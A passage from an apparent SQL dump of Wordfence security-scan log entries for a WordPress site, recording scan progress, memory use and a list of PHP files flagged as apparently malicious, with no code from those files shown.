4500 files containing 58.8 MB of data so far'),(22351,1566807628.659120,2,'info','Analyzed 4600 files containing 59.76 MB of data so far'),(22352,1566807628.806471,2,'info','Analyzed 4700 files containing 60.69 MB of data so far'),(22353,1566807629.166075,2,'info','Analyzed 4800 files containing 62.17 MB of data so far'),(22354,1566807629.298597,2,'info','Analyzed 4900 files containing 62.33 MB of data so far'),(22355,1566807629.411149,2,'info','Analyzed 5000 files containing 63.36 MB of data so far'),(22356,1566807629.526466,2,'info','Analyzed 5100 files containing 63.59 MB of data so far'),(22357,1566807629.654604,2,'info','Analyzed 5200 files containing 63.84 MB of data so far'),(22358,1566807631.151691,2,'info','Analyzed 5300 files containing 72.15 MB of data so far'),(22359,1566807631.323779,2,'info','Analyzed 5400 files containing 72.91 MB of data so far'),(22360,1566807631.435482,2,'info','Analyzed 5500 files containing 73.05 MB of data so far'),(22361,1566807634.841228,2,'info','Analyzed 5600 files containing 74.6 MB of data so far'),(22362,1566807635.386834,2,'info','Analyzed 5700 files containing 77.14 MB of data so far'),(22363,1566807635.501136,2,'info','Analyzed 5800 files containing 77.26 MB of data so far'),(22364,1566807640.740028,2,'info','Analyzed 5900 files containing 103.77 MB of data so far'),(22365,1566807640.975504,2,'info','Analyzed 6000 files containing 104.45 MB of data so far'),(22366,1566807641.315199,2,'info','Analyzed 6100 files containing 106.08 MB of data so far'),(22367,1566807643.945334,2,'info','Analyzed 6200 files containing 111.8 MB of data so far'),(22368,1566807644.164982,2,'info','Analyzed 6300 files containing 113.51 MB of data so far'),(22369,1566807644.330706,2,'info','Analyzed 6400 files containing 114.08 MB of data so far'),(22370,1566807644.568078,2,'info','Analyzed 6500 files containing 115.36 MB of data so far'),(22371,1566807644.731772,2,'info','Analyzed 6600 files containing 116.02 MB of data so far'),(22372,1566807645.008911,2,'info','Analyzed 6700 files containing 117.29 MB of data so far'),(22373,1566807645.389099,2,'info','Analyzed 6800 files containing 119.18 MB of data so far'),(22374,1566807645.630861,2,'info','Analyzed 6900 files containing 121.28 MB of data so far'),(22375,1566807646.509916,2,'info','Analyzed 7000 files containing 126.74 MB of data so far'),(22376,1566807646.654937,2,'info','Analyzed 7100 files containing 128.21 MB of data so far'),(22377,1566807647.011625,2,'info','Analyzed 7200 files containing 129.8 MB of data so far'),(22378,1566807647.369796,2,'info','Analyzed 7300 files containing 131.42 MB of data so far'),(22379,1566807647.762094,2,'info','Analyzed 7400 files containing 133.36 MB of data so far'),(22380,1566807649.092547,2,'info','Analyzed 7500 files containing 138.57 MB of data so far'),(22381,1566807649.292888,2,'info','Analyzed 7600 files containing 139.85 MB of data so far'),(22382,1566807649.433199,2,'info','Analyzed 7700 files containing 141.92 MB of data so far'),(22383,1566807649.584186,2,'info','Analyzed 7800 files containing 144.52 MB of data so far'),(22384,1566807649.764836,2,'info','Analyzed 7900 files containing 146.21 MB of data so far'),(22385,1566807652.829313,2,'info','Analyzed 8000 files containing 147.96 MB of data so far'),(22386,1566807654.256740,2,'info','Analyzed 8100 files containing 158.53 MB of data so far'),(22387,1566807654.613039,2,'info','Analyzed 8200 files containing 160.34 MB of data so far'),(22388,1566807654.984214,2,'info','Analyzed 8300 files containing 162.13 MB of data so far'),(22389,1566807655.476772,2,'info','Analyzed 8400 files containing 166.07 MB of data so far'),(22390,1566807655.640545,2,'info','Analyzed 8500 files containing 167.29 MB of data so far'),(22391,1566807656.336132,2,'info','Analyzed 8575 files containing 168.62 MB of data.'),(23169,1567012426.919003,10,'info','SUM_FINAL:Scan complete. You have 2 new issues to fix. 1 ignored issue was also detected. See below.'),(23168,1567012426.918774,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23166,1567012426.917546,1,'info','-------------------'),(23167,1567012426.918464,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58.25 MB'),(23165,1567012426.911901,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23164,1567012426.816258,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(22399,1566807659.308578,2,'info','Starting scan of file contents'),(22400,1566807660.801015,2,'info','Scanned contents of 1 additional files at 0.67 per second'),(22401,1566807661.901217,2,'info','Scanned contents of 5 additional files at 1.93 per second'),(22402,1566807663.617580,2,'info','Scanned contents of 8 additional files at 1.86 per second'),(22403,1566807664.702934,2,'info','Scanned contents of 11 additional files at 2.04 per second'),(22404,1566807665.902140,2,'info','Scanned contents of 14 additional files at 2.12 per second'),(22405,1566807667.602502,2,'info','Scanned contents of 16 additional files at 1.93 per second'),(22406,1566807687.217840,2,'info','Scanned contents of 17 additional files at 0.61 per second'),(22407,1566807688.397578,2,'info','Scanned contents of 18 additional files at 0.62 per second'),(22408,1566807689.735378,2,'info','Scanned contents of 20 additional files at 0.66 per second'),(22409,1566807690.821715,2,'info','Scanned contents of 22 additional files at 0.70 per second'),(22410,1566807691.837054,2,'info','Scanned contents of 27 additional files at 0.83 per second'),(22411,1566807693.050326,2,'info','Scanned contents of 33 additional files at 0.98 per second'),(22412,1566807694.217259,2,'info','Scanned contents of 38 additional files at 1.09 per second'),(22413,1566807695.249662,2,'info','Scanned contents of 43 additional files at 1.20 per second'),(22414,1566807696.354808,2,'info','Scanned contents of 49 additional files at 1.32 per second'),(22415,1566807697.391374,2,'info','Scanned contents of 54 additional files at 1.42 per second'),(22416,1566807698.393995,2,'info','Scanned contents of 59 additional files at 1.51 per second'),(22748,1566903609.932807,2,'info','Analyzed 8000 files containing 148.49 MB of data so far'),(22749,1566903611.939766,2,'info','Analyzed 8100 files containing 158.83 MB of data so far'),(22750,1566903612.617116,2,'info','Analyzed 8200 files containing 160.95 MB of data so far'),(22751,1566903613.157634,2,'info','Analyzed 8300 files containing 162.37 MB of data so far'),(22752,1566903614.165609,2,'info','Analyzed 8400 files containing 166.46 MB of data so far'),(22753,1566903614.716107,2,'info','Analyzed 8500 files containing 167.87 MB of data so far'),(22754,1566903616.252826,2,'info','Analyzed 8587 files containing 169.3 MB of data.'),(22755,1566903616.254766,10,'info','SUM_ENDBAD:Comparing core WordPress files against originals in repository'),(22756,1566903616.262135,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(22757,1566903616.285709,10,'info','SUM_ENDOK:Scanning for known malware files'),(22758,1566903616.308489,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(22759,1566903616.523521,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(22760,1566903616.552192,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(22761,1566903616.557632,10,'info','SUM_START:Scanning file contents for URLs on a domain blacklist'),(22762,1566903618.346704,2,'info','Starting scan of file contents'),(22763,1566903619.412162,2,'info','Scanned contents of 6 additional files at 5.65 per second'),(22764,1566903620.504909,2,'info','Scanned contents of 13 additional files at 6.04 per second'),(22765,1566903621.733096,2,'info','Scanned contents of 17 additional files at 5.03 per second'),(22766,1566903622.764130,2,'info','Scanned contents of 19 additional files at 4.31 per second'),(22767,1566903633.445294,2,'info','Scanned contents of 20 additional files at 1.32 per second'),(22768,1566903634.483161,2,'info','Scanned contents of 23 additional files at 1.43 per second'),(22769,1566903635.569157,2,'info','Scanned contents of 28 additional files at 1.63 per second'),(22770,1566903636.799921,2,'info','Scanned contents of 33 additional files at 1.79 per second'),(22771,1566903637.913215,2,'info','Scanned contents of 37 additional files at 1.89 per second'),(22772,1566903639.067099,2,'info','Scanned contents of 41 additional files at 1.98 per second'),(22773,1566903640.251221,2,'info','Scanned contents of 45 additional files at 2.05 per second'),(22774,1566903641.336496,2,'info','Scanned contents of 49 additional files at 2.13 per second'),(22775,1566903642.374115,2,'info','Scanned contents of 53 additional files at 2.21 per second'),(22776,1566903643.584270,2,'info','Scanned contents of 58 additional files at 2.30 per second'),(22777,1566903644.756229,2,'info','Scanned contents of 63 additional files at 2.39 per second'),(22778,1566903645.969355,2,'info','Scanned contents of 68 additional files at 2.46 per second'),(22779,1566903647.107651,2,'info','Scanned contents of 73 additional files at 2.54 per second'),(22780,1566903651.402683,2,'info','Scanned contents of 78 additional files at 2.36 per second'),(22781,1566903652.647746,2,'info','Scanned contents of 83 additional files at 2.42 per second'),(22782,1566903653.917895,2,'info','Scanned contents of 87 additional files at 2.45 per second'),(22783,1566903655.128489,2,'info','Scanned contents of 90 additional files at 2.45 per second'),(22784,1566903656.149908,2,'info','Scanned contents of 92 additional files at 2.43 per second'),(22785,1566903657.608178,2,'info','Scanned contents of 95 additional files at 2.42 per second'),(22887,1566903789.389350,2,'info','Scanned contents of 2191 additional files at 12.81 per second'),(22886,1566903788.373839,2,'info','Scanned contents of 2162 additional files at 12.72 per second'),(22786,1566903658.629241,2,'info','Scanned contents of 97 additional files at 2.41 per second'),(22787,1566903659.663122,2,'info','Scanned contents of 101 additional files at 2.44 per second'),(22607,1566838765.958597,1,'info','Initiating quick scan'),(22608,1566838765.960659,10,'info','SUM_START:Checking Web Application Firewall status'),(22606,1566838765.957075,10,'info','SUM_PREP:Preparing a new scan.'),(22609,1566838765.961082,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(22610,1566838765.964243,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(22611,1566838765.999881,10,'info','SUM_ENDOK:Scanning for old themes, plugins and core files'),(22612,1566838766.003153,1,'info','-------------------'),(22613,1566838766.003995,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 82.5 MB'),(22614,1566838766.004283,1,'info','Quick Scan Complete. Scanned in 1 second.'),(22615,1566838766.004545,10,'info','SUM_FINAL:Scan complete. Congratulations, no new problems found.'),(22616,1566903544.583654,10,'info','SUM_PREP:Preparing a new scan.'),(22617,1566903544.586241,1,'info','Contacting Wordfence to initiate scan'),(22618,1566903545.199985,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(22619,1566903547.202195,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(22620,1566903549.204468,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blacklist is for paid members only'),(22885,1566903787.364944,2,'info','Scanned contents of 2113 additional files at 12.50 per second'),(22884,1566903786.351387,2,'info','Scanned contents of 2098 additional files at 12.49 per second'),(22883,1566903785.328880,2,'info','Scanned contents of 2079 additional files at 12.45 per second'),(22417,1566807699.616558,2,'info','Scanned contents of 65 additional files at 1.61 per second'),(22418,1566807700.810937,2,'info','Scanned contents of 71 additional files at 1.71 per second'),(22419,1566807704.818187,2,'info','Scanned contents of 72 additional files at 1.58 per second'),(22420,1566807705.917110,2,'info','Scanned contents of 76 additional files at 1.63 per second'),(22421,1566807706.978789,2,'info','Scanned contents of 80 additional files at 1.68 per second'),(22788,1566903660.703564,2,'info','Scanned contents of 104 additional files at 2.46 per second'),(22789,1566903661.760682,2,'info','Scanned contents of 109 additional files at 2.51 per second'),(22790,1566903662.891392,2,'info','Scanned contents of 115 additional files at 2.58 per second'),(22791,1566903663.969734,2,'info','Scanned contents of 120 additional files at 2.63 per second'),(22792,1566903664.972160,2,'info','Scanned contents of 142 additional files at 3.05 per second'),(22793,1566903665.979844,2,'info','Scanned contents of 164 additional files at 3.44 per second'),(22794,1566903669.620391,2,'info','Scanned contents of 165 additional files at 3.22 per second'),(22795,1566903670.648846,2,'info','Scanned contents of 194 additional files at 3.71 per second'),(22796,1566903671.681920,2,'info','Scanned contents of 225 additional files at 4.22 per second'),(22797,1566903672.700648,2,'info','Scanned contents of 256 additional files at 4.71 per second'),(22798,1566903674.081275,2,'info','Scanned contents of 287 additional files at 5.15 per second'),(22799,1566903675.098444,2,'info','Scanned contents of 309 additional files at 5.45 per second'),(22800,1566903676.218262,2,'info','Scanned contents of 329 additional files at 5.69 per second'),(22801,1566903677.240488,2,'info','Scanned contents of 365 additional files at 6.20 per second'),(22802,1566903678.551856,2,'info','Scanned contents of 386 additional files at 6.41 per second'),(22803,1566903679.619281,2,'info','Scanned contents of 403 additional files at 6.58 per second'),(22804,1566903680.631652,2,'info','Scanned contents of 416 additional files at 6.68 per second'),(22805,1566903681.728664,2,'info','Scanned contents of 429 additional files at 6.77 per second'),(22806,1566903682.743407,2,'info','Scanned contents of 455 additional files at 7.07 per second'),(22807,1566903683.754808,2,'info','Scanned contents of 498 additional files at 7.61 per second'),(22293,1566807599.177665,2,'info','3000 files indexed'),(22294,1566807599.391494,2,'info','3500 files indexed'),(22295,1566807599.545796,2,'info','4000 files indexed'),(22296,1566807599.602558,2,'info','4500 files indexed'),(22297,1566807599.764116,2,'info','5000 files indexed'),(22298,1566807599.869156,2,'info','5500 files indexed'),(22299,1566807599.969104,2,'info','6000 files indexed'),(22300,1566807600.020577,2,'info','6500 files indexed'),(22301,1566807600.193566,2,'info','7000 files indexed'),(22302,1566807600.610126,2,'info','7500 files indexed'),(22303,1566807600.648802,2,'info','8000 files indexed'),(22808,1566903689.045248,2,'info','Scanned contents of 535 additional files at 7.57 per second'),(22809,1566903690.075210,2,'info','Scanned contents of 560 additional files at 7.81 per second'),(22810,1566903691.130527,2,'info','Scanned contents of 585 additional files at 8.04 per second'),(22811,1566903692.134835,2,'info','Scanned contents of 605 additional files at 8.20 per second'),(22812,1566903693.149697,2,'info','Scanned contents of 631 additional files at 8.44 per second'),(22813,1566903694.191835,2,'info','Scanned contents of 665 additional files at 8.77 per second'),(22814,1566903695.569094,2,'info','Scanned contents of 693 additional files at 8.97 per second'),(22815,1566903696.658163,2,'info','Scanned contents of 712 additional files at 9.09 per second'),(22816,1566903697.670771,2,'info','Scanned contents of 736 additional files at 9.28 per second'),(22817,1566903698.681273,2,'info','Scanned contents of 757 additional files at 9.42 per second'),(22818,1566903699.693140,2,'info','Scanned contents of 774 additional files at 9.52 per second'),(22819,1566903700.714764,2,'info','Scanned contents of 813 additional files at 9.87 per second'),(22820,1566903701.741100,2,'info','Scanned contents of 838 additional files at 10.05 per second'),(22821,1566903702.744178,2,'info','Scanned contents of 871 additional files at 10.32 per second'),(22822,1566903703.761104,2,'info','Scanned contents of 909 additional files at 10.64 per second'),(22823,1566903706.928396,2,'info','Scanned contents of 921 additional files at 10.40 per second'),(22824,1566903707.956942,2,'info','Scanned contents of 960 additional files at 10.71 per second'),(22825,1566903708.995217,2,'info','Scanned contents of 989 additional files at 10.91 per second'),(22826,1566903710.002801,2,'info','Scanned contents of 1014 additional files at 11.06 per second'),(22827,1566903711.008437,2,'info','Scanned contents of 1029 additional files at 11.11 per second'),(22828,1566903712.033701,2,'info','Scanned contents of 1064 additional files at 11.36 per second'),(22829,1566903713.062709,2,'info','Scanned contents of 1086 additional files at 11.47 per second'),(22830,1566903714.389565,2,'info','Scanned contents of 1104 additional files at 11.50 per second'),(22831,1566903715.410630,2,'info','Scanned contents of 1116 additional files at 11.50 per second'),(22832,1566903718.196323,2,'info','Scanned contents of 1118 additional files at 11.20 per second'),(22833,1566903719.555888,2,'info','Scanned contents of 1126 additional files at 11.13 per second'),(22834,1566903720.556907,2,'info','Scanned contents of 1154 additional files at 11.29 per second'),(22835,1566903721.805139,2,'info','Scanned contents of 1169 additional files at 11.30 per second'),(22836,1566903724.949054,2,'info','Scanned contents of 1174 additional files at 11.01 per second'),(22837,1566903725.958087,2,'info','Scanned contents of 1191 additional files at 11.07 per second'),(22838,1566903727.098446,2,'info','Scanned contents of 1213 additional files at 11.15 per second'),(22839,1566903728.168366,2,'info','Scanned contents of 1230 additional files at 11.20 per second'),(22422,1566807708.038103,2,'info','Scanned contents of 84 additional files at 1.72 per second'),(22423,1566807709.083036,2,'info','Scanned contents of 88 additional files at 1.77 per second'),(22424,1566807710.215127,2,'info','Scanned contents of 93 additional files at 1.83 per second'),(22425,1566807711.305562,2,'info','Scanned contents of 97 additional files at 1.87 per second'),(22840,1566903729.203294,2,'info','Scanned contents of 1249 additional files at 11.27 per second'),(22841,1566903730.218376,2,'info','Scanned contents of 1268 additional files at 11.33 per second'),(22842,1566903731.221861,2,'info','Scanned contents of 1275 additional files at 11.30 per second'),(22843,1566903732.231283,2,'info','Scanned contents of 1287 additional files at 11.30 per second'),(22844,1566903733.235297,2,'info','Scanned contents of 1304 additional files at 11.35 per second'),(22845,1566903734.360732,2,'info','Scanned contents of 1317 additional files at 11.35 per second'),(22846,1566903735.496606,2,'info','Scanned contents of 1327 additional files at 11.33 per second'),(22847,1566903736.635880,2,'info','Scanned contents of 1332 additional files at 11.26 per second'),(22848,1566903737.643588,2,'info','Scanned contents of 1346 additional files at 11.28 per second'),(22849,1566903738.672365,2,'info','Scanned contents of 1363 additional files at 11.33 per second'),(22850,1566903739.711594,2,'info','Scanned contents of 1385 additional files at 11.41 per second'),(22851,1566903744.213439,2,'info','Scanned contents of 1396 additional files at 11.09 per second'),(22852,1566903745.238634,2,'info','Scanned contents of 1423 additional files at 11.21 per second'),(22853,1566903746.247336,2,'info','Scanned contents of 1457 additional files at 11.39 per second'),(22854,1566903747.285866,2,'info','Scanned contents of 1496 additional files at 11.60 per second'),(22855,1566903748.314046,2,'info','Scanned contents of 1514 additional files at 11.65 per second'),(22856,1566903749.377602,2,'info','Scanned contents of 1533 additional files at 11.70 per second'),(22857,1566903750.405150,2,'info','Scanned contents of 1560 additional files at 11.81 per second'),(22858,1566903751.429373,2,'info','Scanned contents of 1588 additional files at 11.93 per second'),(22859,1566903752.452231,2,'info','Scanned contents of 1597 additional files at 11.91 per second'),(22860,1566903753.505405,2,'info','Scanned contents of 1607 additional files at 11.89 per second'),(22861,1566903754.743915,2,'info','Scanned contents of 1622 additional files at 11.89 per second'),(22862,1566903755.770228,2,'info','Scanned contents of 1639 additional files at 11.93 per second'),(22863,1566903756.824529,2,'info','Scanned contents of 1662 additional files at 12.00 per second'),(22864,1566903757.859622,2,'info','Scanned contents of 1689 additional files at 12.11 per second'),(22865,1566903758.946584,2,'info','Scanned contents of 1707 additional files at 12.14 per second'),(22866,1566903763.479523,2,'info','Scanned contents of 1728 additional files at 11.91 per second'),(22867,1566903764.498608,2,'info','Scanned contents of 1751 additional files at 11.98 per second'),(22868,1566903765.541395,2,'info','Scanned contents of 1770 additional files at 12.03 per second'),(22869,1566903766.550243,2,'info','Scanned contents of 1789 additional files at 12.07 per second'),(22870,1566903767.570362,2,'info','Scanned contents of 1816 additional files at 12.17 per second'),(22871,1566903768.574960,2,'info','Scanned contents of 1838 additional files at 12.24 per second'),(22872,1566903769.603895,2,'info','Scanned contents of 1858 additional files at 12.28 per second'),(22873,1566903770.605231,2,'info','Scanned contents of 1883 additional files at 12.37 per second'),(22874,1566903771.882478,2,'info','Scanned contents of 1904 additional files at 12.40 per second'),(22875,1566903772.892363,2,'info','Scanned contents of 1936 additional files at 12.53 per second'),(22876,1566903773.904024,2,'info','Scanned contents of 1953 additional files at 12.56 per second'),(22676,1566903568.338059,2,'info','Analyzed 800 files containing 17.05 MB of data so far'),(22677,1566903568.518892,2,'info','Analyzed 900 files containing 17.86 MB of data so far'),(22678,1566903568.742128,2,'info','Analyzed 1000 files containing 18.39 MB of data so far'),(22679,1566903568.961115,2,'info','Analyzed 1100 files containing 18.86 MB of data so far'),(22680,1566903569.187045,2,'info','Analyzed 1200 files containing 19.3 MB of data so far'),(22681,1566903569.515759,2,'info','Analyzed 1300 files containing 20.64 MB of data so far'),(22276,1566807596.187912,2,'info','Found 5 themes'),(22708,1566903581.060796,2,'info','Analyzed 4000 files containing 53.86 MB of data so far'),(22274,1566807596.186490,2,'info','Found 26 plugins'),(22275,1566807596.186649,2,'info','Getting theme list from WordPress'),(22273,1566807596.177586,2,'info','Getting plugin list from WordPress'),(22682,1566903569.777388,2,'info','Analyzed 1400 files containing 21.03 MB of data so far'),(22426,1566807712.332182,2,'info','Scanned contents of 101 additional files at 1.90 per second'),(22683,1566903570.311217,2,'info','Analyzed 1500 files containing 21.39 MB of data so far'),(22170,1566549101.134694,2,'info','Adding issue: File appears to be malicious: crw3tpxd.php'),(22171,1566549101.135889,2,'info','Adding issue: File appears to be malicious: index.php'),(22172,1566549101.136662,2,'info','Adding issue: File appears to be malicious: krccjsge.php'),(22173,1566549101.137622,2,'info','Adding issue: File appears to be malicious: loud7zhz.php'),(22174,1566549101.138985,2,'info','Adding issue: File appears to be malicious: wp-admin/network/pubrhlwr.php'),(22175,1566549101.139642,2,'info','Adding issue: File appears to be malicious: wp-content/plugins/index.php'),(22176,1566549101.140273,2,'info','Adding issue: File appears to be malicious: wp-content/plugins/lxvmqzku.php'),(22177,1566549101.141298,2,'info','Adding issue: File appears to be malicious: wp-content/themes/twentyseventeen/inc/emflcxnb.php'),(22178,1566549101.142311,2,'info','Adding issue: File appears to be malicious: wp-includes/Requests/Exception/HTTP/505.php'),(22179,1566549101.142938,2,'info','Adding issue: File appears to be malicious: wp-includes/images/wlw/hgzuguxf.php'),(22180,1566549101.144421,2,'info','Adding issue: File appears to be malicious: wp-includes/sodium_compat/namespaced/Core/lvxrrksb.php'),(22181,1566549101.145742,2,'info','Adding issue: File appears to be malicious: wp-settings.php'),(22187,1566549101.212662,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(22188,1566549101.213123,2,'info','Checking 50 host keys against Wordfence scanning servers.'),(22189,1566549101.507818,2,'info','Done host key check.'),(22190,1566549101.508162,2,'info','Done examining URLs'),(22193,1566549101.860077,2,'info','Scanning comments with 3000 left to scan.'),(22194,1566549102.299671,2,'info','Scanning comments with 2000 left to scan.'),(22195,1566549102.714038,2,'info','Scanning comments with 1000 left to scan.'),(22198,1566549103.142972,2,'info','Starting password strength check on 3 users.'),(22205,1566549114.725630,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(22206,1566549114.725951,2,'info','Done examining URLs'),(22208,1566549114.732011,1,'info','-------------------'),(22209,1566549114.732364,2,'info','Wordfence used 25.57 MB of memory for scan. Server peak memory usage was: 106.07 MB'),(22210,1566549114.732560,1,'info','Scan Complete. Scanned 8776 files, 27 plugins, 5 themes, 68 posts, 3793 comments and 2596 URLs in 3 minutes 33 seconds.'),(22492,1566807797.587219,2,'info','Scanned contents of 1658 additional files at 11.99 per second'),(22493,1566807798.589338,2,'info','Scanned contents of 1692 additional files at 12.15 per second'),(22494,1566807799.703386,2,'info','Scanned contents of 1724 additional files at 12.28 per second'),(22495,1566807800.737381,2,'info','Scanned contents of 1754 additional files at 12.40 per second'),(22496,1566807801.807397,2,'info','Scanned contents of 1776 additional files at 12.46 per second'),(22497,1566807802.824268,2,'info','Scanned contents of 1804 additional files at 12.57 per second'),(22498,1566807803.830473,2,'info','Scanned contents of 1829 additional files at 12.66 per second'),(22499,1566807804.935521,2,'info','Scanned contents of 1857 additional files at 12.75 per second'),(22500,1566807805.940142,2,'info','Scanned contents of 1888 additional files at 12.88 per second'),(22501,1566807806.957983,2,'info','Scanned contents of 1922 additional files at 13.02 per second'),(22502,1566807807.993348,2,'info','Scanned contents of 1945 additional files at 13.08 per second'),(22503,1566807808.994236,2,'info','Scanned contents of 1967 additional files at 13.14 per second'),(22504,1566807810.036221,2,'info','Scanned contents of 2006 additional files at 13.31 per second'),(22505,1566807811.058080,2,'info','Scanned contents of 2038 additional files at 13.43 per second'),(22506,1566807815.571095,2,'info','Scanned contents of 2071 additional files at 13.25 per second'),(22507,1566807816.618054,2,'info','Scanned contents of 2085 additional files at 13.25 per second'),(22508,1566807817.657595,2,'info','Scanned contents of 2103 additional files at 13.28 per second'),(22509,1566807818.663442,2,'info','Scanned contents of 2150 additional files at 13.49 per second'),(22510,1566807820.058836,2,'info','Scanned contents of 2183 additional files at 13.58 per second'),(22511,1566807821.060809,2,'info','Scanned contents of 2214 additional files at 13.69 per second'),(22512,1566807822.079562,2,'info','Scanned contents of 2260 additional files at 13.88 per second'),(22513,1566807823.098640,2,'info','Scanned contents of 2311 additional files at 14.11 per second'),(22514,1566807824.106962,2,'info','Scanned contents of 2331 additional files at 14.14 per second'),(22515,1566807825.151885,2,'info','Scanned contents of 2351 additional files at 14.18 per second'),(22516,1566807826.153731,2,'info','Scanned contents of 2381 additional files at 14.27 per second'),(22517,1566807827.154138,2,'info','Scanned contents of 2415 additional files at 14.39 per second'),(22518,1566807828.179026,2,'info','Scanned contents of 2444 additional files at 14.47 per second'),(22519,1566807829.190746,2,'info','Scanned contents of 2481 additional files at 14.60 per second'),(22520,1566807830.207040,2,'info','Scanned contents of 2521 additional files at 14.75 per second'),(22521,1566807833.608332,2,'info','Scanned contents of 2555 additional files at 14.66 per second'),(22522,1566807834.617240,2,'info','Scanned contents of 2576 additional files at 14.69 per second'),(22523,1566807835.627930,2,'info','Scanned contents of 2592 additional files at 14.70 per second'),(22524,1566807836.656223,2,'info','Scanned contents of 2612 additional files at 14.73 per second'),(22525,1566807837.701737,2,'info','Scanned contents of 2632 additional files at 14.75 per second'),(22526,1566807838.722255,2,'info','Scanned contents of 2658 additional files at 14.82 per second'),(22527,1566807839.839267,2,'info','Scanned contents of 2683 additional files at 14.86 per second'),(22528,1566807840.847084,2,'info','Scanned contents of 2715 additional files at 14.96 per second'),(22529,1566807842.062918,2,'info','Scanned contents of 2740 additional files at 14.99 per second'),(22530,1566807843.277478,2,'info','Scanned contents of 2755 additional files at 14.98 per second'),(22531,1566807844.949221,2,'info','Scanned contents of 2761 additional files at 14.87 per second'),(22532,1566807845.956130,2,'info','Scanned contents of 2778 additional files at 14.88 per second'),(22533,1566807847.020893,2,'info','Scanned contents of 2820 additional files at 15.02 per second'),(22534,1566807852.547853,2,'info','Scanned contents of 2838 additional files at 14.69 per second'),(22535,1566807853.553388,2,'info','Scanned contents of 2849 additional files at 14.67 per second'),(22536,1566807855.277621,2,'info','Scanned contents of 2860 additional files at 14.59 per second'),(22537,1566807856.293548,2,'info','Scanned contents of 2876 additional files at 14.60 per second'),(22538,1566807857.314135,2,'info','Scanned contents of 2893 additional files at 14.61 per second'),(22539,1566807858.391000,2,'info','Scanned contents of 2908 additional files at 14.61 per second'),(22540,1566807859.434787,2,'info','Scanned contents of 2923 additional files at 14.61 per second'),(22541,1566807860.450562,2,'info','Scanned contents of 2949 additional files at 14.66 per second'),(22542,1566807861.469904,2,'info','Scanned contents of 2979 additional files at 14.74 per second'),(22543,1566807862.707656,2,'info','Scanned contents of 3019 additional files at 14.84 per second'),(22544,1566807863.716945,2,'info','Scanned contents of 3052 additional files at 14.93 per second'),(22545,1566807864.793167,2,'info','Scanned contents of 3075 additional files at 14.96 per second'),(22546,1566807865.812803,2,'info','Scanned contents of 3110 additional files at 15.06 per second'),(22547,1566807872.831864,2,'info','Scanned contents of 3131 additional files at 14.66 per second'),(22548,1566807873.834180,2,'info','Scanned contents of 3140 additional files at 14.64 per second'),(22549,1566807874.837627,2,'info','Scanned contents of 3145 additional files at 14.59 per second'),(22550,1566807875.908905,2,'info','Scanned contents of 3158 additional files at 14.58 per second'),(22551,1566807878.879616,2,'info','Scanned contents of 3163 additional files at 14.41 per second'),(22552,1566807879.345957,2,'info','Scanned contents of 3175 additional files at 14.43 per second'),(22553,1566807879.346241,2,'info','Asking Wordfence to check URLs against malware list.'),(22554,1566807879.363986,2,'info','Checking 3906 host keys against Wordfence scanning servers.'),(22555,1566807879.897727,2,'info','Done host key check.'),(22556,1566807879.901781,2,'info','Checking 14 URLs from 13 sources.'),(22557,1566807880.298925,2,'info','Done URL check.'),(22558,1566807880.681180,2,'info','Done file contents scan'),(22559,1566807880.682606,2,'info','Adding issue: File appears to be malicious: 91zf4lv7.php'),(22560,1566807880.686023,2,'info','Adding issue: File appears to be malicious: 980z5hai.php'),(22561,1566807880.686855,2,'info','Adding issue: File appears to be malicious: crw3tpxd.php'),(22562,1566807880.687615,2,'info','Adding issue: File appears to be malicious: index.php'),(22563,1566807880.688377,2,'info','Adding issue: File appears to be malicious: iw0ugau6.php'),(22564,1566807880.689132,2,'info','Adding issue: File appears to be malicious: krccjsge.php'),(22565,1566807880.689809,2,'info','Adding issue: File appears to be malicious: loud7zhz.php'),(22566,1566807880.690533,2,'info','Adding issue: File appears to be malicious: wp-admin/network/pubrhlwr.php'),(22567,1566807880.691267,2,'info','Adding issue: File appears to be malicious: wp-content/plugins/index.php'),(22568,1566807880.691979,2,'info','Adding issue: File appears to be malicious: wp-content/plugins/lxvmqzku.php'),(22569,1566807880.692654,2,'info','Adding issue: File appears to be malicious: wp-content/plugins/woocommerce/woocommerce.php'),(22570,1566807880.693286,2,'info','Adding issue: File appears to be malicious: wp-content/themes/twentyseventeen/inc/emflcxnb.php'),(22571,1566807880.693980,2,'info','Adding issue: File appears to be malicious: wp-includes/Requests/Exception/HTTP/406.php'),(22572,1566807880.694845,2,'info','Adding issue: File appears to be malicious: wp-includes/Requests/Exception/HTTP/505.php'),(22573,1566807880.695541,2,'info','Adding issue: File appears to be malicious: wp-includes/images/wlw/hgzuguxf.php'),(22574,1566807880.696181,2,'info','Adding issue: File appears to be malicious: wp-includes/sodium_compat/namespaced/Core/lvxrrksb.php'),(22575,1566807880.696829,2,'info','Adding issue: File appears to be malicious: wp-settings.php'),(23163,1567012426.792655,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23162,1567012426.790966,10,'info','SUM_START:Checking Web Application Firewall status'),(23161,1567012426.778034,1,'info','Initiating quick scan'),(23160,1567012426.764992,10,'info','SUM_PREP:Preparing a new scan.'),(22580,1566807880.708263,10,'info','SUM_START:Scanning posts for URLs on a domain blacklist'),(22581,1566807880.760782,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(22582,1566807880.761224,2,'info','Checking 50 host keys against Wordfence scanning servers.'),(22583,1566807881.066605,2,'info','Done host key check.'),(22584,1566807881.066905,2,'info','Done examining URLs'),(22585,1566807881.070930,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blacklist'),(22586,1566807881.076060,10,'info','SUM_START:Scanning comments for URLs on a domain blacklist'),(22587,1566807881.488788,2,'info','Scanning comments with 3000 left to 